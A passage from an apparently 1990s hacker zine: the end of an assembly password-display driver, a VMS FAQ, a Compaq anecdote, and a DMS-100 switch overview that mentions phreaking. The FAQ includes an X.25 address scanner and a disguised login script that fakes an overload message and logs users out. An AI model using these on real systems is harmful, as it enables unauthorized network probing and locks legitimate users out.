mov ax,04c01h ;abnormal termination
int 21h
success_pass:
mov ax,04c00h
int 21h
devhandle dw ?
cur_pass db 'Current password is ['
databuffr db 20 dup (?)
pass_end db '] ;'
num_chr db ' '
db ' characters',0ah,0dh,0ah,0dh
prompt db 'New word: ','$'
stringsz equ $ - pass_end
pass_len db 00
newpass db 20 dup (?)
errormsg db 'error changing password!',0ah,0dh,'$'
no_drvr db 'Error: '
devname db "HACKPWD ",00
db 'device driver not loaded!',0ah,0dh,07,'$'
------------------------------------------------------------------------------
-- Frequently & Rarely asked questions about VMS -- part one
by Opticon the Disassembled - UPi
[1]
" I have a kropotkin.hlp file. What could I possibly do with it ? "
$ library /insert /help sys$help:helplib.hlb kropotkin.hlp
.
.
.
$ help kropotkin
[2]
" I have a bakunin.tlb file. What to do with it ? "
$ library /extract=(*) bakunin.tlb
.
.
.
$ dir
[3]
" I would like to have a look at prunton.dat. "
$ dump [/block=(count:x)] prunton.dat
Where "x" is the number of blocks DUMP will display.
[4]
" How can I use an external editor with mail ? "
$ mail :== mail /edit=(send,reply=extract,forward)
[5]
" How a HELP file is organized ? "
$ create example.hlp
1 EXAMPLE
THIS IS AN EXAMPLE.
2 MORE_EXAMPLES
MORE EXAMPLES.
3 EVEN_MORE_EXAMPLES
EVEN MORE EXAMPLES.
<CTRL-Z>
[6]
" How can I have a look at queues ? "
$ show queue smtp /all/full
or
$ show queue /batch/all/full
or
$ show queue /all/full
[7]
" My mail is holded, for some reason, in the SMTP queue... "
Either
$ delete /entry=XXX
or
$ set entry XXX /release
in order to force VMS to release it right away.
[8]
" How do I have a look at DTE and circuits available. "
$ mc ncp show known dte
and
$ mc ncp show known circuits
You may also may find of interest:
$ mc ncp show known networks
$ mc ncp show known lines
$ mc ncp show known destinations
[9]
" I need a NUA scanner for VMS. "
$ OPEN/READ VALUES SCAN.VAL
$ READ VALUES PRE
$ READ VALUES DTE
$ READ VALUES END
$ CLOSE VALUES
$ LOG = "SCAN.LIS"
$ TMP = "SCAN.TMP"
$ OPEN/WRITE FILE 'LOG
$ WRITE FILE "PREFIX:",PRE
$ WRITE FILE "START :",DTE
$ WRITE FILE "LAST :",END
$LOOP:
$ ON ERROR THEN GOTO OPEN
$ SPAWN/NOWAIT/OUTPUT='TMP' SET HOST/X29 'PRE''DTE'
$ WAIT 00:00:06
$ SPAWN_NAME = F$GETJPI("","USERNAME")
$ SPAWN_NAME = F$EXTRACT(0,F$LOC(" ",SPAWN_NAME),SPAWN_NAME) + "_"
$ CONTEXT = ""
$FIND_PROC:
$ PID = F$PID(CONTEXT)
$ IF PID .EQS. "" THEN GOTO OPEN
$ IF F$LOC(SPAWN_NAME,F$GETJPI(PID,"PRCNAM")) .EQ. 0 THEN STOP/ID='PID
$ GOTO FIND_PROC
$OPEN:
$ ON ERROR THEN GOTO OPEN
$ OPEN/READ PAD 'TMP
$ MSSG = " Process stopped"
$ ON ERROR THEN GOTO CLOSE
$ READ PAD LINE
$ IF F$LOC("call clear",LINE) .LT. F$LEN(LINE) THEN READ PAD LINE
$ MSSG = F$EXTRACT(F$LOC(",",LINE)+1,80,LINE)
$CLOSE:
$ CLOSE PAD
$ DELETE 'TMP';*
$ IF F$LOC("obtain",MSSG).NE.F$LENGTH(MSSG) THEN GOTO NOCONN
$ WRITE FILE PRE,DTE,MSSG
$NOCONN:
$ DTE = DTE + 1
$ IF DTE .LE. END THEN GOTO LOOP
$ CLOSE FILE
( I don't have a clue by whom the code was written. )
then
$ create scan.val
prefix
starting_NUA
ending_NUA
<CTRL-Z>
$ submit /noprint scan.com
.
.
.
$ search scan.lis "call connected"
[10]
" How do I crash a VAX !? "
$ set default sys$system
$ @shutdown
or
$ set default sys$system
$ run opccrash
[11]
" I have a dostogiefski.cld file; what do I do with it ? "
$ set command dostogiefski.cld
[12]
" Can I send messages to interactive processes ? "
$ reply [/user=username] [/bell] [/id=xxxx] " Carlos Marigella "
[13]
" How can I prevent someone from phoning me all the time ? "
$ set broadcast=(nophone)
[14]
" Can I postpone/disable interactive logins ? "
$ set logins /interactive=0
$ set logins /interactive
will display current value.
Under the same `logic' :
$ create innocent_filename.com
$ set nocontrol
$ context = ""
$ pid = F$PID(context)
$ user_name = F$GETJPI(pid,"username")
$ wait 00:01:00.00
$ write sys$output ""
$ write sys$output " System overloaded; please try again later "
$ write sys$output " Logging out process ''pid', of user ''user_name' "
$ write sys$output ""
$ logout /full
Add either to sys$system:sylogin.com or sys$login:login.com the following:
" $ @innocent_filename.com ".
[15]
" How can I modify the welcome file ? Where is it held ? "
$ set default sys$system
$ edit welcome.txt
[16]
" I am editing a huge text file. How can I reach the end of it ? "
at the editor's prompt type:
*find end
or
*find "search string"
[17]
" How can I be sure than noone is watching me from a hidden process ? "
$ show system /process
VAX/VMS V5.5-2 on node STIRNER 30-MAR-1937 02:10:41.94 Uptime 2 03:05:25
Pid Process Name State Pri I/O CPU Page flts Ph.Mem
.
.
.
00000114 SYMBIONT_4 HIB 5 290 0 00:00:19.05 1650 47
00000117 SMTP_SYMBIONT HIB 4 33398 0 00:16:49.67 246104 426
00000118 SYMBIONT_6 HIB 4 47868 0 00:05:09.01 296 121
00001255 SYMBIONT_0001 CUR 13 15 64293 0 00:05:08.12 1982 248
$ show system /full
VAX/VMS V5.5-2 on node STIRNER 30-MAR-1937 02:10:59.64 Uptime 2 03:05:43
Pid Process Name State Pri I/O CPU Page flts Ph.Mem
.
.
.
00000114 SYMBIONT_4 HIB 5 290 0 00:00:19.05 1650 47
[1,4]
00000117 SMTP_SYMBIONT LEF 5 33407 0 00:16:49.78 246116 502
[1,4]
00000118 SYMBIONT_6 HIB 5 47872 0 00:05:09.03 296 121
[1,4]
00001255 SYMBIONT_0001 CUR 13 15 64348 0 00:05:09.60 2063 268
[1,4]
$
See the difference between system's SYMBIONT processes ( i.e. SYMBIONT_4,
SYMBIONT_6, SMTP_SYMBIONT ) and the one created by using a `stealth' program
( SYMBIONT_0001 ); the names and the User Identification Codes may vary, but
state, priority, physical memory used, page faults, input/output and Process
IDentification numbers, can reveal, in combination, such a nastyness.
Afterwards you may " show process /id=xxxx /continuous ",
or " stop /id=xxxx ".
[18]
" Can I view the CPU usage of each process ? "
$ monitor processes /topcpu
will display a bar-chart of this kind.
[19]
Run the following .COM file and it will display information you'd
possibly need on an account and/or node. It uses simple lexical functions.
$ output :== write sys$output
$ output ""
$ node_id = F$CSID(context)
$ nodename = F$GETSYI("nodename",,node_id)
$ if F$GETSYI("cluster_member") .EQS. "TRUE"
$ then output " ''nodename' is a member of a cluster. "
$ else output " ''nodename' is not a member of a cluster. "
$ context = ""
$ username = F$GETJPI("","username")
$ output " Username : ''username' "
$ group = F$GETJPI("","grp")
$ output " Group : ''group' "
$ uic = F$USER()
$ output " User Identification Code : ''uic' "
$ pid = F$PID(context)
$ output " Process IDentification : ''pid' "
$ process = F$PROCESS()
$ output " Process Name : ''process' "
$ terminal = F$GETJPI("","terminal")
$ output " Terminal Name : ''terminal' "
$ priority = F$GETJPI("","authpri")
$ output " Authorized Priority : ''priority' "
$ maxjobs = F$GETJPI("","maxjobs")
$ output " Maximum Number of Processes Allowed : ''maxjobs' "
$ authpriv = F$GETJPI("","authpriv")
$ output " Authorized Privileges : ''authpriv' "
$ curpriv = F$GETJPI("","curpriv")
$ output " Current Privileges : ''curpriv' "
$ directory = F$DIRECTORY()
$ output " Directory : ''directory' "
$ protection = F$ENVIRONMENT("protection")
$ output " Protection : ''protection' "
$ boottime = F$GETSYI("boottime")
$ output " Boot Time : ''boottime' "
$ time = F$TIME()
$ output " Current Time : ''time' "
$ version = F$GETSYI("version")
$ output " VMS version : ''version' "
$ output ""
You may :
$ library /extract=(lexicals) /output=lexicals.hlp sys$help:helplib.hlb
and then transfer lexicals.hlp.
[20]
" How can I view/modify my disk quota limit ? "
DiskQuota was a standalone utility in versions prior to five; It is now
a subset of the System Management utility, and thus you should :
$ set def sys$system
$ run sysman
SYSMAN> diskquota show /device=dua1: [1,1]
%SYSMAN-I-QUOTA, disk quota statistics on device DUA1: --
Node
UIC Usage Permanent Quota Overdraft Limit
[1,1] 123456 1500000 100
SYSMAN> diskquota modify /device=dua1: [1,1] /permquota=654321 /overdraft=1000
[END]
Post Scriptum
Some operations require privileges.
------------------------------------------------------------------------------
Compaq CEO blunders on TV
Compaq CEO Eckard Pfeiffer last week visited The Netherlands
to do some pr work. During a television interview for NOVA,
a well known news show that aired last Friday, Pfeiffer
claimed that pc's were easy to use, and could be used by
virtually anyone. So, the reporter asked him to switch the
tv channel on a Presario that was next to Pfeiffer that ran
a Windows-based TV tuner. The result was Pfeifer frantically
clicking on several menu bars, but instead of switching
channels, he exited the program altogether. To make things
worse, the reporter next asked him to start up a word
processor. Again, Pfeiffer, clicked his way around the
desktop, but couldn't find nor start the program. Finally,
he was asked to start up a game. You saw Pfeifer (now in
deep trouble) clicking on all the tabs of the "easy to use"
tab-works interface that is included on all Presario's,
looking for games, while muttering "Were are ze games? I
can't find ze games on zis machine!!!", his accent becoming
increasingly more German then before. It was almost like Dr.
Strangelove. The last shot is of a Compaq tech support guy,
rushing in to help him out.... So much for ease of use....
Voorburgwal 129, 1012 EP
Amsterdam, The Netherlands).
------------------------------------------------------------------------------
Ok, I'm going to assume that you already know a little bit about what it
is you're reading. The DMS100/IBN (integrated business network) is
composed of mainly electronic business sets, phones, data units, and
attendant consoles and units, all physically at the customers place of
business. While the digital switching software and support hardware is
located at the Telco. Together, in tandem they work to give the customer
one of the best combinations of features and benefits. The DMS-100
combines voice AND data in one business comunications package. One of
the many advantages is it offers the use with *any* sized business with
up to 30,000 lines. The IBN system controls most operations, diagnoses
problems, and also has the ability to do limited repairs on itself.
Being modular, it can meet the needs at hand, and have the ability for
new features, as time goes by, while still maintaining a cost-effective
environment. Another advantage is that is uses a central attendant where
and when needed. Along with Call Routing, or CDR, to control and
restrict Long Distnace Calling, and network management. The IBN gives
the user hassle free operation. Northern Telcom's DMS-100 switches,
which by the way are digital, are frequently backed-up by their
*higher trained* personnel, which isnt saying much. Some other features
are: Automatic Routing Selection, or ARS, which routes the long distance
calls, if they are even allowed, over the most economical (right) route
available. Station Message Detail Recording, or SMDR, which basically
does just what its name states, records long distance charges, including
but not limited to, originating number, time and length of call,
authorization code, and others... Yet another capability is the Direct
Inward System Access (DISA), which gives the personnel the ability to use
the system to place long distance calls cheaply, even from outside the
company (sounds like a PBX a bit doesn't it?).
System Features and Benefits: There are 6 Call Waiting Lamp Loop Keys,
each with its associated source AND destination lamp to signify the
status of both the calling and the called party status. The Second
feature is Alpha Numeric Display Multiple Directory Number Feature Keys,
up to 42 of them, which can be used for a Paging System, or speed
dialing, and things along those lines. A third feature is the release
Source/Release Destination Console, which features access to paging.
Other features which mainly are unimportant I will list here, they are:
Call Identifier Exclude Source/Exclude Destination. Remote Console Call
Destination. Signal Source.Signal Destination. Call Holding. Call
Detail Entry. Remote Console Call Selection. Console Display. Camp-on
Automatic Recall Conference. A 6 port 2 way splitting non-delayed
operation. Busy Verification of Lines. Manual and Automatic Hold.
Multiple Console OPeration. Busy verification of trunks. Switched Loop
Operation. Trunk Group Busy Indication. Uniform Call distribution form
queue. Multiple listed directory numbers. Control of trunk group
access. Secrecy. Night Service. Serial call. Speed Calling. Lockout.
Delayed Operation. Position Busy. Interposition Calling. THrough Call
Pickup. RIng Again. Multiple Directory Numbers. Intercom. Speed
Call. Call Transfer/Conference. On-Hook Dialing. Additional
Programmable Features include automatic hold. Listem-on hold. Multiple
Appearance Directory Numbers, or MADN. Single Call Arrangement.
Multiple Call Arrangement. Privacy Release. Tone Ringing with Volume
Control. Call Waiting. Stored Number Redial. Private Business Line.
And Finally a 32 character alphanumeric data unit. The DMS100/IBN can be
used as a "standalone" or can be attached to the business set or other
phone type unit. It has the ability to transmit over a two wire loop, at
speeds of up to 56 kb per second, using a proprietary time compression
multiplexing technology. The DMS100 is also available in different
models to suit existing terminal capacities. It also provides integrated
voice/data, that right data, communications. They, the phone company,
and data unit, can operate together, simultaniously, or even independant
of one another. Being fully digitized, it was one if the first switches
to eliminate the use of those dinosaur analog modems (for which i still
have a few if anyone wants to buy em off me or give me shipping money and
ill send em to ya free). Well thats it for now. This should give you a
good understanding of the capabilities of one of the many switches in use
today. In fact, although outdated somewhat, my telco, citizens
utilities, and one in stockton from what i just found out, is still using
this switch (poor me in elk grove, ca eh?)
which makes phreaking quite an easy task, not that it was really ever
hard but anything to make it easier help. ANyway, if you have any
comments/flames/general bullshit, mail it to either
jmatrix@mindvox.phantom.com or capthook@sekurity.com the latter being a
last resort email address.
ciao
---Captain Hook
------------------------------------------------------------------------------